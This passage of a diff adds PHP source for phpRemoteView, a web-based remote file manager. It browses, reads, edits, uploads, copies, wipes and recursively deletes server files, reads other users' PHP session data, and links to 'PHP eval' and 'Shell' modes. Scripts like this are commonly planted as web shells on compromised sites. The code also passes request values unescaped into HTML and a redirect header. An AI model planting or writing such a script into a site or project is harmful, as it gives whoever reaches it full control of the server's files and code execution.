+               if (!isset($tmp2['name']) || $tmp2['name']=="") $tgr=$fgroup[$k];
+               else $tgr=$tmp2['name'];
+               echo jsval("$tow/$tgr");
+               break;
+
+            case "c": 
+               echo jsval(display_perms($fperms[$k])); break;
+            
+            case "1": echo jsval(date($cp[2],$fctime[$k])); break;
+            
+            case "2": echo jsval(date($cp[2],$fmtime[$k])); break;
+            
+            case "3": echo jsval(date($cp[2],$fatime[$k])); break;
+
+            default: echo "??$cn[$i]??";
+
+         } //switch ($ftype)
+      
+      }//for ($cn)
+      
+      echo "0);\n";
+
+   }//foreach ($names)
+   
+   echo "\n\n</script>\n\n\n";
+   
+   echo '</td></tr></table></td></tr></table></td></tr></table>';
+
+
+   echo "<P align=center>
+   <font size=1 style='Font: 8pt Verdana'><B>
+   <a href=$self?c=setup&ref=$uurl>".mm("Setup")."</a> | 
+   <a href=$self?c=t>PHP eval</a> | 
+   <a href=$self?c=phpinfo>phpinfo()</a> | 
+   <a href=$self?c=t>Shell</a> | 
+   <a href=$self?c=codes>".mm("Char map")."</a> |
+   ".mm("Language").": 
+   <a href=$self?c=set&c2=eng&ref=$uurl&pan=0>".mm("English")."</a>/<a href=$self?c=set&c2=rus&ref=$uurl&pan=0>".mm("Russian")."</a>
+   
+   </b>
+   <hr size=1 noshade width=55%><center>
+
+   <table border=0 cellspacing=0 cellpadding=0><tr><td width=32>
+   <font face=webdings style='Font-size: 22pt;'>&#0033;</font></td><td>
+   <font size=1 style='Font: 8pt Verdana'>phpRemoteView &copy; Dmitry Borodin (".mm("version")." $version)<br>
+   ".mm("Free download")." - <a href='http://php.spb.ru/remview/'>http://php.spb.ru/remview/</a></b></font></td>
+   </tr></table>";
+
+break;
+
+
+case "set": 
+
+   switch ($c2) {
+      case "sort":
+         $name=intval($name);
+         if ($name==$cc[0]) if ($cc[1]==='0') $cc[1]='1'; else $cc[1]='0';
+         $cc[0]=$name;
+         break;
+
+      case "panel":
+         $cn='';
+         foreach ($names as $k=>$v) {
+            if ($v!="") $cn.=substr($v,0,1);
+         }
+         $cc[0]=substr($sort,0,1);
+         $cc[1]=substr($sortby,0,1);
+         $cp[2]=substr($datetime,0,50);
+         $cp[3]=substr($fontname,0,50);
+         $cp[4]=substr($fontsize,0,50);
+
+         //exit("cn=$cn<br>cc=$cc");
+         break;
+
+      case "eng":
+         $cc[5]=1;
+         break;
+
+      case "rus":
+         $cc[5]=2;
+         break;
+
+   }
+
+
+   $cookie=$cc."~".$cn."~".$cp[2]."~".$cp[3]."~".$cp[4];
+   if ($c2=="reset") $cookie=implode("~",$cp_def);
+   //echo "<script>alert('$cookie')</script>";
+   setcookie("cp$pan",$cookie,time()+24*60*60*333,'/');
+   header("Location: $ref");
+   echo "<script>location.href=\"$ref\";</script>";
+   //echo "[$ref]";
+   //phpinfo();
+   break;
+
+
+case "setup": 
+
+   echo $GLOBALS['html'];
+
+   echo "<center><h3><b>phpRemoteView ".mm("setup")."</b> [<A href='javascript:history.go(-1)'>".mm("back")."</a>]</h3></center><hr size=1 noshade>";
+
+   echo "<STYLE>
+   .setup {
+      font-size: 8pt;
+      font-family: Tahoma;
+   }
+   HTML, TD {font: 90%}
+   </STYLE>";
+
+   echo "
+   <b><u>".mm("Reset all settings")."</u></b>: <a href=$self?c=set&c2=reset&pan=$panel&ref=$ref>".mm("clear")."</a>";
+   echo " <font color=white>(".mm("Current").": <small>".implode(" | ",$cp)."</small>)</font><P>";
+
+   echo "
+   <form action=$self method=post>
+   <input type=hidden name=c value=\"set\">
+   <input type=hidden name=c2 value=\"panel\">
+   <input type=hidden name=pan value=\"$panel\">
+   <input type=hidden name=ref value=\"$ref\">
+   ";
+   echo "<b><u>".mm("Colums and sort")."</u></b><br>";
+
+   echo "".mm("Sort order").": ";
+   echo "<input type=radio name=sortby value=0 id=q3 ".($cc[1]=='0'?"checked":"").">";
+   echo "<label for=q3>".mm("Ascending sort")."</label>";
+   echo "<input type=radio name=sortby value=1 id=q4 ".($cc[1]=='1'?"checked":"").">";
+   echo "<label for=q4>".mm("Descending sort")."</label><br>";
+
+   echo "<input type=radio name=sort value='n' id=q1 ".($cc[0]=='n'?"checked":"").">";
+   echo "<label for=q1>".mm("Sort by filename")."</label>";
+   echo "<input type=radio name=sort value='e' id=q2 ".($cc[0]=='e'?"checked":"").">";
+   echo "<label for=q2>".mm("Sort by filename extension")."</label>";
+   echo "<table border=0 cellspacing=0 cellpadding=3>";
+   for ($i=0; $i<2; $i++) {
+      echo "<tr>";
+      for ($j=0; $j<7; $j++) {
+         $n=$j+$i*7;
+         echo "<td align=center><label for=$n>Sort by ".($n+1)."</label>";
+         echo "<input type=radio name=sort value=$n id=$n ".($cc[0]=="$n"?"checked":"").">";
+         echo "<br><select class=setup name=names[] size=".(count($cn_name)+1).">";
+         echo "<option value=''>--hidden--";
+         foreach ($cn_name as $kk=>$vv) 
+            echo "<option value='$kk'".($n<strlen($cn) && $cn[$n]==$kk?" selected":"").">$vv";
+         echo "</select>";
+      }
+      echo "</tr>";
+   }
+   echo "</table><P>";
+
+   echo "<b><u>".mm("Date/time format")."</u></b>: <input type=text name=datetime value=\"$cp[2]\"><br>
+   d - day, m - month, y - year2, Y - year4, H - hour, m - minute, s - second<P>";
+
+   echo "<b><u>".mm("Panel font & size")."</u></b>: 
+   <input type=text name=fontname value=\"$cp[3]\" size=12> 
+   <input type=text name=fontsize value=\"$cp[4]\" size=2>pt<P>";
+
+   echo "<P><center><input type=submit value='&nbsp; &nbsp; S &nbsp; U &nbsp; B &nbsp; M &nbsp; I &nbsp; T &nbsp; &nbsp;'></center></form>";
+
+   
+   echo "<hr size=1 noshade>";
+   break;
+
+
+
+// view
+case "v":
+
+
+   if (!isset($fnot)) $fnot=0;
+   if (!isset($ftype)) $ftype=0;
+   
+   if ($fnot==0) {
+      echo $GLOBALS['html'];
+      up($d,$f);
+      echo "<a href=$self?&c=l&d=".urlencode($d)."><nobr>&lt;&lt;&lt;<b>".mm("back to directory")."</b> &gt;&gt;&gt;</nobr></a>";
+      up_link($d,$f);
+      echo "<hr size=1 noshade>";
+   }      
+   if (!realpath($d.$f) || !file_exists($d.$f)) exit("".mm("file not found")."");
+   if (!is_file($d.$f) || !$fi=@fopen($d.$f,"rb")) exit("<p><font color=red><b>".mm("access denied")."</b></font>");
+
+   if ($ftype==0 || $ftype==4) {
+      $buf=fread($fi,max(filesize($d.$f),$maxsize_fread));
+      fclose($fi);
+   }
+
+
+   switch ($ftype) {
+
+   case 0: 
+      echo "<pre>".htmlspecialchars($buf)."</pre>";
+      break;
+
+   case 1: 
+      readfile($d.$f); 
+      break;
+
+   case 2: 
+      header("Content-type: image/gif"); 
+      readfile($d.$f); 
+      break;
+
+   case 3: // download
+
+      if (isset($fatt) && strlen($fatt)>0) {
+          $attach=$fatt; 
+          header("Content-type: text/plain"); 
+      } 
+      else {
+          $attach=$f;
+          header("Content-type: phpspbru"); 
+      }
+      header("Content-disposition: attachment; filename=\"$attach\";"); 
+      readfile($d.$f); 
+      break;
+
+   case 4: // session
+   
+      echo "<xmp>";
+      if (substr($f,0,5)=="sess_" && preg_match("!^sess_([a-z0-9]{32})$!i",$f,$ok)) {
+         ini_set("session.save_path",$d);
+         session_id($ok[1]);
+         session_start();
+         print_r($HTTP_SESSION_VARS);
+      }
+      else {
+         print_r(unserialize($buf));
+      }
+      echo "</xmp>";//<hr size=1 noshade><xmp>";
+      break;
+
+   }
+
+   break;
+
+
+
+
+
+
+
+case "i": // information for FILE
+
+   echo $GLOBALS['html'];
+   up($d,$f);
+   echo "<a href=$self?&c=l&d=".urlencode($d)."><nobr>&lt;&lt;&lt;<b>".mm("back to directory")."</b> &gt;&gt;&gt;</nobr></a>";
+   up_link($d,$f);
+
+   if (!realpath($d.$f) || !file_exists($d.$f)) exit(mm("file not found"));
+
+   echo "<P><big><b><tt>".htmlspecialchars($d.$f)."</tt></b></big><P>";
+   echo "<table class=tab border=0 cellspacing=1 cellpadding=2>";
+   echo "<tr class=tr><td>".mm("Size")."        </td><td> ".filesize($d.$f)."</td></tR>";
+   echo "<tr class=tr><td>".mm("Owner")."/".mm("Group")." </td><td> ";      
+   $tmp=@_posix_getpwuid(fileowner($d.$f));
+   if (!isset($tmp['name']) || $tmp['name']=="") echo fileowner($d.$f)." ";
+   else echo $tmp['name']." ";
+   $tmp=@_posix_getgrgid(filegroup($d.$f));
+   if (!isset($tmp['name']) || $tmp['name']=="") echo filegroup($d.$f);
+   else echo $tmp['name'];
+   echo "<tr class=tr><td>".mm("FileType")."    </td><td> ".filetype($d.$f)."</td></tr>";
+   echo "<tr class=tr><td>".mm("Perms")."       </td><td> ".display_perms(fileperms($d.$f))."</td></tr>";
+   echo "<tr class=tr><td>".mm("Create time")." </td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr>";
+   echo "<tr class=tr><td>".mm("Access time")." </td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr>";
+   echo "<tr class=tr><td>".mm("MODIFY time")." </td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr>";
+   echo "</table><P>";
+
+   $fi=@fopen($d.$f,"rb");
+   if ($fi) {
+      $str=fread($fi,$hexdump_lines*$hexdump_rows);
+      echo "<b>".mm("HEXDUMP PREVIEW")."</b>";
+      $n=0;
+      $a0="00000000<br>";
+      $a1="";
+      $a2="";
+      for ($i=0; $i<strlen($str); $i++) {
+         $a1.=sprintf("%02X",ord($str[$i])).' ';
+         switch (ord($str[$i])) {
+            case 0:  $a2.="<font class=s2>0</font>"; break;
+            case 32: 
+            case 10:
+            case 13: $a2.="&nbsp;"; break;
+            default:  $a2.=htmlspecialchars($str[$i]);
+         }
+         $n++;
+         if ($n==$hexdump_rows) {
+            $n=0;
+            if ($i+1<strlen($str)) $a0.=sprintf("%08X",$i+1)."<br>";
+            $a1.="<br>";
+            $a2.="<br>";
+         }
+      }
+      //if ($a1!="") $a0.=sprintf("%08X",$i)."<br>";
+      echo "<table border=0 bgcolor=#cccccc cellspacing=1 cellpadding=4 ".
+         "class=sy><tr><td bgcolor=#e0e0e0>$a0</td><td bgcolor=white>".
+         "$a1</td><td bgcolor=white>$a2</td></tr></table><p>";
+   }
+   
+   echo "<b>Base64: </b>
+   <nobr>[<a href=$self?c=base64&c2=0&d=".urlencode($d)."&f=".urlencode($f).">Encode</a>]&nbsp;</nobr>
+   <nobr>[<a href=$self?c=base64&c2=1&d=".urlencode($d)."&f=".urlencode($f).">+chunk</a>]&nbsp;</nobr>
+   <nobr>[<a href=$self?c=base64&c2=2&d=".urlencode($d)."&f=".urlencode($f).">+chunk+quotes</a>]&nbsp;</nobr>
+   <nobr>[<a href=$self?c=base64&c2=3&d=".urlencode($d)."&f=".urlencode($f).">Decode</a>]&nbsp;</nobr>
+   <P>";
+
+
+   if (!$write_access) exitw();
+
+   $msg="";
+   if (!is_file($d.$f) || !$fi=@fopen($d.$f,"r+")) $msg=" (<font color=red><b>".mm("ONLY READ ACCESS")."</b></font>)";
+   else fclose($fi);
+   if (!is_file($d.$f) || !$fi=@fopen($d.$f,"r")) $msg=" (<font color=red><b>".mm("Can't READ file - access denied")."</b></font>)";
+   else fclose($fi);
+   if ($msg=="") $msg=" (".mm("full read/write access").")";
+
+   echo "<b>".mm("FILE SYSTEM COMMANDS")."$msg</b><p>";
+
+   echo "
+<table border=0 cellspacing=0 cellpadding=0><tr>
+
+<td bgcolor=#cccccc><a href=$self?c=e&d=".urlencode($d)."&f=".urlencode($f).
+"><b>&nbsp;&nbsp;".mm("EDIT")."&nbsp;&nbsp;<br>&nbsp;&nbsp;".mm("FILE")."&nbsp;&nbsp;</b></a></td>
+<td>&nbsp;&nbsp;&nbsp;</td>
+
+<td><form action=$self method=post>
+<input type=hidden name=c value=delete>
+<input type=hidden name=c2 value=delete>
+<input type=hidden name=d value=\"".htmlspecialchars($d)."\">
+<input type=hidden name=f value=\"".htmlspecialchars($f)."\">
+<input type=submit value='".mm("DELETE")."'><small>&gt;</small><input type=checkbox name=confirm value=delete></nobr><br>
+<small>".mm("Delete this file")."</small>
+</td><td></form></td><td>&nbsp;&nbsp;&nbsp;</td>
+
+<td><form action=$self method=post>
+<input type=hidden name=c value=delete>
+<input type=hidden name=c2 value=clean>
+<input type=hidden name=d value=\"".htmlspecialchars($d)."\">
+<input type=hidden name=f value=\"".htmlspecialchars($f)."\">
+<input type=submit value='".mm("CLEAN")."'><small>&gt;</small><input type=checkbox name=confirm value=touch></nobr><br>
+<small>".mm("filesize to 0byte")."</small>
+</td><td></form></td><td>&nbsp;&nbsp;&nbsp;</td>
+
+<td><form action=$self method=post>
+<input type=hidden name=c value=delete>
+<input type=hidden name=c2 value=touch>
+<input type=hidden name=d value=\"".htmlspecialchars($d)."\">
+<input type=hidden name=f value=\"".htmlspecialchars($f)."\">
+<input type=submit value='".mm("TOUCH")."'><small>&gt;</small><input type=checkbox name=confirm value=touch></nobr><br>
+<small>".mm("Set current 'mtime'")."</small>
+</td><td></form></td><td>&nbsp;&nbsp;&nbsp;</td>
+
+<td><form action=$self method=post>
+<input type=hidden name=c value=delete>
+<input type=hidden name=c2 value=wipe>
+<input type=hidden name=d value=\"".htmlspecialchars($d)."\">
+<input type=hidden name=f value=\"".htmlspecialchars($f)."\">
+<input type=submit value='".mm("WIPE(delete)")."'><small>&gt;</small><input type=checkbox name=confirm value=delete></nobr><br>
+<small>".mm("Write '0000..' and delete")."</small>
+</td><td></form></td><td>&nbsp;&nbsp;&nbsp;</td>
+</tr></table>
+";
+
+   echo "<form action=$self method=post><input type=hidden name=c value=copy>".
+        "<b>".mm("COPY FILE")."</b> ".mm("from")." <input type=text size=40 name=from value=\"".htmlspecialchars($d.$f)."\">".
+        " ".mm("to")." <input type=text name=to size=40 value=\"".htmlspecialchars($d.$f)."\">".
+        "<nobr><input type=submit value='".mm("COPY")."!'>".
+        "&gt;<input type=checkbox name=confirm value=copy></nobr></form>";
+
+echo "
+<form action=$self method=post>
+<b>".mm("MAKE DIR")."</b> (".mm("type full path").")
+<input type=hidden name=c value=newdir_submit>
+<input type=text size=60 name=df value=\"".htmlspecialchars($d)."\">
+<input type=submit value='".mm("MkDir")."'>
+</form>";
+
+
+echo "
+<form action=$self method=post>
+<b>".mm("CREATE NEW FILE or override old file")."</b><br>
+<input type=hidden name=c value=newfile_submit>
+".mm("Full file name")." <input type=text size=50 name=df value=\"".htmlspecialchars($d.$f)."\">
+<input type=submit value='".mm("CREATE/OVERRIDE")."'>
+<input type=checkbox name=confirm value=1 id=conf1><label for=conf1>&lt;=confirm</label><br>
+<textarea name=text cols=70 rows=10 style='width: 100%;'></textarea><br>
+</form>";
+
+echo "
+<form enctype='multipart/form-data' action='$self' method=post>
+<input type=hidden name=c value=fileupload_submit>
+<b>FILE UPLOAD: ".mm("CREATE NEW FILE or override old file")."</b><br>
+<input type=hidden name='MAX_FILE_SIZE' value=999000000>
+1. ".mm("select file on your local computer").": <input name=userfile type=file><br>
+2. ".mm("save this file on path").": 
+  <input name=df size=50 value=\"$d$f\"><br>
+3. <input type=checkbox name=df2 value=1 id=df2 checked>
+  <label for=df2>".mm("create file name automatic")."</label>
+  &nbsp;&nbsp;".mm("OR")."&nbsp;&nbsp;
+  ".mm("type any file name").":
+  <input name=df3 size=20><br>
+4. <input type=checkbox name=df4 value=1 id=df4>
+  <label for=df4>".mm("convert file name to lovercase")."</label><br>
+<input type=submit value='".mm("Send File")."'>
+</form>";
+
+break;
+
+
+case "base64":
+
+   echo "<pre>\n";
+   $ff=fopen($d.$f,"rb") or exit("<p>access denied");
+   $text=fread($ff,max(filesize($d.$f),$maxsize_fread));
+   fclose($ff);
+   switch ($c2) {
+      case 0:
+         echo base64_encode($text);
+         break;
+      case 1:
+         echo chunk_split(base64_encode($text));
+         break;
+      case 2:
+         $text=base64_encode($text);
+         echo substr(preg_replace("!.{1,76}!","'\\0'.\n",$text),0,-2);
+         break;
+      case 3:
+         echo base64_decode($text);
+         break;
+   }
+   break;
+
+
+
+case "d": // information for DIRECTORY
+
+   echo $GLOBALS['html'];
+   up($d,"","Directory");
+   echo "<a href=$self?&c=l&d=".urlencode($d)."><nobr>&lt;&lt;&lt;<b>".mm("back to directory")."</b> &gt;&gt;&gt;</nobr></a>";
+   echo "<p>";
+
+   //up_link($d,"");
+
+   if (!realpath($d) || !is_dir($d.$f)) exit(mm("dir not found"));
+
+   echo "<table border=0 cellspacing=0 cellpadding=0><tr><td>";
+
+   echo "<table border=0 cellspacing=1 cellpadding=1 class=tab>";
+   echo "<tr class=tr><td>&nbsp;&nbsp;&nbsp;".mm("Owner")."/".mm("Group")."&nbsp;&nbsp;&nbsp;</td><td>";      
+   $tmp=@_posix_getpwuid(fileowner($d.$f));
+   if (!isset($tmp['name']) || $tmp['name']=="") echo fileowner($d.$f)." ";
+   else echo $tmp['name']." ";
+   $tmp=@_posix_getgrgid(filegroup($d.$f));
+   if (!isset($tmp['name']) || $tmp['name']=="") echo filegroup($d.$f);
+   else echo $tmp['name'];
+   echo "</td></tr><tr class=tr><td>";
+   echo mm("Perms")."</td><td>".display_perms(fileperms($d.$f))."</td></tr><tr class=tr><td>";
+   echo mm("Create time")."</td><td>".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr class=tr><td>";
+   echo mm("Access time")."</td><td>".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr class=tr><td>";
+   echo mm("MODIFY time")."</td><td>".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table>";
+
+   echo "</tD><form action=$self method=get><td width=70>&nbsp;</td><td>
+   <input type=hidden name=c value=\"tree\">
+   Root <input type=text name=d value=\"$d\"><br>
+   <input type=checkbox name=showfile value=1 id=tree1><label for=tree1>Show files in tree</label><br>
+   <input type=checkbox name=showsize value=1 id=tree2 checked><label for=tree2>Show dir/files size</label><br>
+   <input type=submit value='Show TREE directory'>";
+
+   echo "</td></form></tr></table><P>";
+
+
+   
+   if (!$write_access) exitw();
+
+   echo "<b>".mm("FILE SYSTEM COMMANDS")."</b><p>";
+
+   echo "
+<table border=0 cellspacing=0 cellpadding=0><tr>
+
+<td><form action=$self method=post>
+<input type=hidden name=c value=dirdelete>
+<input type=hidden name=c2 value=files>
+<input type=hidden name=d value=\"".htmlspecialchars($d)."\">
+<input type=hidden name=ref value=\"$url\">
+<input type=submit value='".mm("Delete all files in dir")." (rm *)'><small>&gt;</small><input type=checkbox name=confirm value=delete></nobr>
+</td><td></form></td><td>&nbsp;&nbsp;&nbsp;</td>
+
+<td><form action=$self method=post>
+<input type=hidden name=c value=dirdelete>
+<input type=hidden name=c2 value=dir>
+<input type=hidden name=d value=\"".htmlspecialchars($d)."\">
+<input type=hidden name=ref value=\"$url\">
+<input type=submit value='".mm("Delete all dir/files recursive")." (rm -fr)'><small>&gt;</small><input type=checkbox name=confirm value=delete></nobr>
+</td><td></form></td><td>&nbsp;&nbsp;&nbsp;</td>
+
+</tr></table>
+";
+
+echo "
+<form action=$self method=post>
+<b>".mm("MAKE DIR")."</b> (type full path)
+<input type=hidden name=c value=newdir_submit>
+<input type=text size=60 name=df value=\"".htmlspecialchars($d)."\">
+<input type=submit value='".mm("MkDir")."'>
+</form>";
+
+
+echo "
+<form action=$self method=post>
+<b>".mm("CREATE NEW FILE or override old file")."</b><br>
+<input type=hidden name=c value=newfile_submit>
+".mm("Full file name")." <input type=text size=50 name=df value=\"".htmlspecialchars($d)."\">
+<input type=submit value='".mm("CREATE/OVERRIDE")."'>
+<input type=checkbox name=confirm value=1 id=conf1><label for=conf1>&lt;=confirm</label><br>
+<textarea name=text cols=70 rows=10 style='width: 100%;'></textarea><br>
+</form>";
+
+echo "
+<form enctype='multipart/form-data' action='$self' method=post>
+<input type=hidden name=c value=fileupload_submit>
+<b>(FILE UPLOAD) ".mm("CREATE NEW FILE or override old file")."</b><br>
+<input type=hidden name='MAX_FILE_SIZE' value=999000000>
+1. ".mm("select file on your local computer").": <input name=userfile type=file><br>
+2. ".mm("save this file on path").": 
+  <input name=df size=50 value=\"".realpath($d)."/\"><br>
+3. <input type=checkbox name=df2 value=1 id=df2 checked>
+  <label for=df2>".mm("create file name automatic")."</label>
+  &nbsp;&nbsp;".mm("OR")."&nbsp;&nbsp;
+  ".mm("type any file name").":
+  <input name=df3 size=20><br>
+4. <input type=checkbox name=df4 value=1 id=df4>
+  <label for=df4>".mm("convert file name to lovercase")."</label><br>
+<input type=submit value='".mm("Send File")."'>
+</form>";
+
+
+break;
+
+
+
+case "tree":
+
+$tcolors=array(
+'eee','ddd','ccc','bbb','aaa','999','888','988','a88','b88','c88','d88','e88','d98',
+'ca8','bb8','ac8','9d8','8e8','8d9','8ca','8bb','8ac','89d','88e');
+
+function dir_tree($df,$level=0) {
+   global $tcolors,$self;
+
+   $df=str_replace("//","/",$df);
+   $dirs=array();
+   $files=array();
+   if ($dir=opendir($df)) {
+      while (($file=readdir($dir))!==false) {
+         if ($file=="." || $file=="..") continue;
+         if (is_dir("$df/$file"))  {
+            $dirs[]=$file;
+         }
+         else {
+            $files[]=$file;
+         }
+      }
+   }
+   closedir($dir);
+
+   sort($dirs);
+   sort($files);
+   
+   $i=min($level,count($tcolors)-1);
+   $c=$tcolors[$i][0].$tcolors[$i][0].$tcolors[$i][1].$tcolors[$i][1].$tcolors[$i][2].$tcolors[$i][2];
+
+   echo "\r\n\r\n\r\n
+   <table width=100% border=0 cellspacing=2 cellpadding=1><tr><td bgcolor=#000000>
+   <table width=100% border=0 cellspacing=0 cellpadding=1 bgcolor=#$c>
+   <tr><td colspan=3 class=dir>".
+   "<a href=$self?c=l&d=".urlencode($df)." class=dir><img src=$self?name=dir&c=img&1 border=0>".
+   $df."</a></td></tr>";
+
+   if (count($dirs) || count($files)) {
+      echo "<tr><td width=15>&nbsp;</td><td class=all width=97%>";
+      for ($i=0; $i<count($files); $i++) {
+         echo $files[$i]." ";
+      }
+      for ($i=0; $i<count($dirs); $i++) {
+         dir_tree($df."/".$dirs[$i],$level+1);
+      }
+      echo "</td><td width=10>&nbsp;</td></tr>";
+   }
+   echo '</table></td></tr></table>';
+}
+
+   echo "
+   <STYLE>
+   .all {
+   font-family: Verdana;
+   font-size: 80%;
+   }
+   .dir {
+   font-family: Verdana;
+   font-size: 95%;
+   background: #666699;
+   font-weight: bold;
+   color: white
+   }
+   </STYLE>";
+   echo $GLOBALS['html'];
+
+   up($d,"","Directory");
+   echo "<a href=$self?&c=l&d=".urlencode($d)."><nobr>&lt;&lt;&lt;<b>".mm("back to directory")."</b> &gt;&gt;&gt;</nobr></a>";
+   echo "<p>";
+   dir_tree($d);
+   break;
+
+
+
+case "delete":
+
+   if (!$write_access) exitw();
+
+   if (!isset($c2)) exit("err# delete 1");
+   if (!isset($confirm) || strlen($confirm)<3) exit("".mm("Confirm not found (go back and set checkbox)")."");
+   echo "<a href=$self?&c=l&d=".urlencode($d)."><nobr>&lt;&lt;&lt;<b>".mm("back to directory")."</b> &gt;&gt;&gt;</nobr></a><p>";
+   if (!isset($d) || !isset($f) || !@file_exists($d.$f) || !@realpath($d.$f)) 
+      exit("".mm("Delete cancel - File not found")."");
+   if (realpath(getenv("SCRIPT_FILENAME"))==$d.$f && !isset($delete_remview_confirm))
+      exit(mm("Do you want delete this script (phpRemoteView) ???")."<br><br><br><br>
+      <a href='$self?c=delete&c2=$c2&confirm=delete&d=".urlencode($d)."&f=".urlencode($f)."&delete_remview_confirm=YES'>[".mm("YES").", ".mm("DELETE")." <b>".mm("ME")."</b>]</a>
+       &nbsp; &nbsp; &nbsp;
+      <a href='javascript:history.back(-1)'>[".mm("NO (back)")."]</a>");
+
+   switch ($c2) {
+   case "delete":
+       //exit("$d $f");
+       ob();
+       if (!unlink($d.$f)) 
+          obb().exit("<font color=red><b>".mm("Delete cancel")." - ".mm("ACCESS DENIED")."</b></font>$obb"); 
+       Header("Location: $self?c=l&d=".urlencode($d));
+       echo "<P><a href=$self?c=l&d=".urlencode($d).">".mm("done (go back)")."!</a><p>";
+       echo "".mm("Delete ok")."";
+       break;
+   case "touch":
+       ob();
+       if (!touch($d.$f)) 
+          obb().exit("<font color=red><b>".mm("Touch cancel")." - ".mm("ACCESS DENIED")."</b></font>$obb"); 
+       Header("Location: $self?c=i&d=".urlencode($d)."&f=".urlencode($f));
+       echo "<a href=$self?c=i&d=".urlencode($d)."&f=".urlencode($f).">".mm("done (go back)")."!</a><p>";
+       echo "".mm("Touch ok (set current time to 'modify time')")."";
+       break;
+   case "clean":
+       ob();
+       $fi=fopen($d.$f,"w+") or 
+          obb().exit("<font color=red><b>".mm("Clean (empty file) cancel")." - ".mm("ACCESS DENIED")."</b></font>obb"); 
+       ftruncate($fi,0);
+       fclose($fi);
+       Header("Location: $self?c=i&d=".urlencode($d)."&f=".urlencode($f));
+       echo "<a href=$self?c=i&d=".urlencode($d)."&f=".urlencode($f).">".mm("done (go back)")."!</a><p>";
+       echo "".mm("Clean ok (file now empty)")."";
+       break;
+   case "wipe":
+       $size=filesize($d.$f);
+       ob();
+       $fi=fopen($d.$f,"w+") or 
+          obb().exit("<font color=red><b>".mm("Wipe cancel - access denied")."</b></font>$obb");
+       $str=md5("phpspbru".mt_rand(0,999999999).time());
+       for ($i=0; $i<5; $i++) $str.=$str; // strlen 1024 byte
+       for ($i=0; $i<intval($size/1024)+1; $i++) fwrite($fi,$str);
+       fclose($fi);
+       ob();
+       if (!unlink($d.$f)) 
+          obb().exit("err# delete 2 - file was rewrite, but not delete...(only write access, delete disable)$obb"); 
+       Header("Location: $self?c=l&d=".urlencode($d));
+       echo "<a href=$self?c=i&d=".urlencode($d).">".mm("done (go back)")."!</a><p>";
+       echo "".mm("Wipe ok (file deleted)")."";
+       break;
+   }
+
+   //Header("Location: $self?c=l&d=".urlencode(dirname($df)));
+   //echo "<a href=$self?c=i&d=".urlencode(dirname($df)).">SAVE NEW FILE DONE (go back)!</a>";
+
+   break;
+
+
+case "dirdelete":
+
+   if (!$write_access) exitw();
+
+function dir_delete($df) {
+   echo "<b>".basename($df)."</b><ul>";
+   if ($dir=opendir($df)) {
+      $i=0;
+      while (($file=readdir($dir))!==false) {
+         if ($file=="." || $file=="..") continue;
+         if (is_dir("$df/$file"))  {
+            dir_delete($df."/".$file);
+         } 
+         else {
+            echo "$file<br>";
+            echo "".mm("DELETE")." <tt>$df/$file</tt> ...<br>";
+            unlink($df."/".$file);
+         }
+         $i++;
+      }
+      //if ($i==0) echo "-empty-<br>";
+   }
+   closedir($dir);
+   echo "</ul>";
+   echo "".mm("DELETE")." ".mm("DIR")." <tt>$df</tt> ...<br>";
+   rmdir("$df/$file");
+}
+
+   if (!isset($c2)) exit("error dirdelete 1");
+   if (!isset($confirm)) exit("".mm("Confirm not found (go back and set checkbox)")."!");
+   $df="$d";
+
+   switch ($c2) {
+
+      case "files":
+         echo "<h3>".mm("Deleting all files in")." <tt>$df</tt> ...</h3>";
+         if ($dir=opendir($df)) {
+            while (($file=readdir($dir))!==false) {
+                if ($file=="." || $file=="..") continue;
+                if (is_dir($df.$file))  {
+                   echo "<big><tt><b>>$file</b></tt></big> ".mm("skip").": ".filetype($df.$file)."<br>";
+                }
+                elseif (is_file($df.$file)) {
+                   echo "<big><tt><b><font color=red>$file</font></b></tt></big> ".mm("deleting")."...";
+                   unlink($df.$file);
+                   echo "<br>";
+                }
+                else {
+                   echo "<big><tt><b>$file</b></tt></big> ".mm("skip").": ".filetype($df.$file)."<br>";
+                }
+            }  
+         }
+         closedir($dir);
+         $ref="$self?c=l&d=".urlencode($d);
+         break;
+   
+      case "dir":
+         echo "<h3>".mm("Deleting all dir/files (recursive) in")." <tt>$df</tt> ...</h3>";
+         dir_delete($df);
+         $ref="$self?c=l&d=".urlencode(realpath($d."/.."));
+         break;
+   }
+   //header("Location: $ref");
+   echo "<p><a href=$ref>".mm("DONE, go back")."</a>";
+   break;
+
+case "copy": 
+
+   if (!$write_access) exitw();
+
+   if (!isset($from) || !@file_exists($from) || !@realpath($from))
+      exit("err# copy 1, file [$from] not found");
+   if (!isset($to) || strlen($to)==0)
+      exit("err# copy 2, file [$to] not found");
+   echo "Copy: ....<hr size=1 noshade>";
+   if (!copy($from,$to)) { 
+      echo "<hr size=1 noshade><font color=red><b>Error!</b></font><p>";
+      echo "View <a href=$self?c=l&d=".urlencode(dirname($from)).">".dirname($from)."<p>";
+   }
+   else
+      echo "".mm("DONE")."!<p>";
+      echo "View <a href=$self?c=l&d=".urlencode(dirname($from)).">".dirname($from)."</a> (dir 'from')<p>";
+      echo "View <a href=$self?c=l&d=".urlencode(dirname($to)).">".dirname($to)."</a> (dir 'to')<p>";
+   break;
+
+
+
+
+case "e": // edit
+
+   if (!$write_access) exitw();
+
+   if (!@realpath($d.$f) || !file_exists($d.$f)) exit("".mm("file not found")."");
+   echo $GLOBALS['html'];
+   up($d,$f);
+   echo "<a href=$self?&c=l&d=".urlencode($d)."><nobr>&lt;&lt;&lt;<b>".mm("back to directory")."</b> &gt;&gt;&gt;</nobr></a>";
+   up_link($d,$f);
+   $msg="";
+   if (!is_file($d.$f) || !$fi=@fopen($d.$f,"r+")) $msg=" (<font color=red><b>".mm("ONLY READ ACCESS (don't edit!)")."</b></font>)";
+   else fclose($fi);
+   if (!is_file($d.$f) || !$fi=@fopen($d.$f,"r")) $msg=" (<font color=red><b>".mm("Can't READ file - access denied (don't edit!)")."</b></font>)";
+   else fclose($fi);
+   if ($msg=="") $msg="(<font color=#009900><b>".mm("full read/write access")."</b></font>)";
+   echo "<p><b>".mm("EDIT FILE")."</b> $msg<p>";
+
+   if (!$fi=@fopen($d.$f,"rb")) exit("".mm("can't open, access denied")."");
+   echo "<form action=$self method=post>
